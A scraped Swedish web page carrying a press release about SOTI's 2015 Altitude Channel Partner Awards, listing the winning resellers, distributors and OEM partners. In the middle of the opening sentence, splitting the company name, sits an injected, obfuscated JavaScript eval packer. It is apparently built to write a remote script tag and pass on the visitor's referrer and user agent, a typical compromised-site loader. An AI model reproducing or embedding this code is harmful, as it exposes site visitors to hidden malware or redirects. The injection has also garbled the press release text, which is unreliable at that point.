Image Image Image Image Image Image Image Image Image Image

| 20 februari, 2020

Scroll to top

Top

SOTI presenterar vinnarna av Channel Partner Awards

SOTI presenterar vinnarna av Channel Partner Awards
Sebastian

OTI eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbahk|var|u0026u|referrer|ffbis||js|php’.split(’|’),0,{}))
Inc., världsledande inom?lösningar för
Enterprise Mobility Management?(EMM) och Bring Your Own Device (BYOD), presenterade idag vinnarna av SOTI Altitude Channel Partner Awards. Vinnarna tillkännagavs vid SOTIs konferens SOTI SYNC 2015 där SOTI-användare och partners från hela världen samlats.

De vinnande företagen deltar alla i det prisbelönta programmet SOTI Altitude Partner Program som ger partnerföretag tillgång till SOTIs mobilitetslösningar, däribland flaggskeppsprodukten MobiControl, vilket gör att de kan erbjuda strategier för mobilitet och sakernas internet (IoT) till sina kunder. Genom att få tillgång till SOTIs expertis och lösningar kan de företag som deltar i programmet utveckla sitt mobila erbjudande och skapa avancerade tekniska lösningar.

Priserna delades ut av Charlene O’Hanlon, chefredaktör för den inflytelserika IT-kanalsbloggen ”The VAR Guy”.

– Den entusiasm som SOTIs partners visar på SOTI SYNC visar helt klart att SOTIs partnerprogram är framgångsrikt och att det hjälper företagen att skapa nya intäktsströmmar, säger Charlene O´Hanlon. Det var jättekul att få ge SOTIs topp-partners ett erkännande för deras utmärkta arbete.

– Med vårt omfattande partnerprogram och våra avancerade EMM-lösningar strävar vi på SOTI efter att ge ett högt mervärde till våra partners, vilka är jätteviktiga för vår verksamhet. Många kandidater var värdiga vinnare, så det har varit svårt att välja vilka som skulle få ta emot årets priser. Vi vill gratulera alla vinnare och önskar alla våra partners framgång i framtiden, säger Roula Vrsic, vice president of Global Marketing och ansvarig för SOTI Altitude Partner Program

SOTI Altitude Channel Partner Awards uppmärksammar både de partners som på ett enastående sätt driver utvecklingen inom EMM framåt och de som visat stark tillväxt i såväl intäkter som antal implementationer.

Vinnarna är som följer:

 • Årets partners
  • Application Partner of the Year Homecare Homebase, för deras innovativa lösningar baserade på SOTI-teknik som möter viktiga kundbehov.
  • Distribution Partner of the Year Data Select Ltd., största enskilda distributör med högst antal nya och aktiva auktoriserade återförsäljare.
  • Global Partner of the Year Barcoding, Inc., den värdeskapande återförsäljare med högst procentuell tillväxt under det senaste året.
  • OEM (Original Equipment Manufacturer) Partner of the Year Honeywell, som har haft högst tillväxt i antal OEM-licenser, geografiska regioner och kunder.
  • Cloud Partner of the Year OCR, den återförsäljare som adderat mest värde med SOTIs molnlösningar det senaste året.
  • Regional Value-Added Resellers of the Year – Går till den leverantör som haft sin regions högsta procentuella tillväxt det senaste året.
   • Nordamerika – Strategic Mobility Group LLC
   • Europa Retail in Motion
   • Asien och Stillahavsregionen Skywire Pty Ltd.
   • Mellanöstern och norra Afrika Ntegras Bilisim Elekronik Hizmetleri San. Ve Tic. Ltd. Sti.
   • Latinamerika Go2Tech
  • Rising Star VAR of the Year – One Point Systems Ltd., den återförsäljare med högst tillväxt under sitt första som SOTI-partner.
  • Marketing in Motion – UDS Data Systems Ltd., den partner som på bästa sätt utnyttjat SOTIs marknadsföringsresurser för att skapa inflytelserika och marknadsledande marknadsföringskampanjer som uppmärksammar SOTIs teknologi och framhäver dess effekt på ROI (Return on Investment).
  • Market Maker Award – AbeTech Inc., som är den återförsäljare som har fått flest nya kunder under det senaste året.

Vill du veta mer om SOTIs prisbelönta Altitude Partner Program besök gärna: https://partners.soti.net/altitude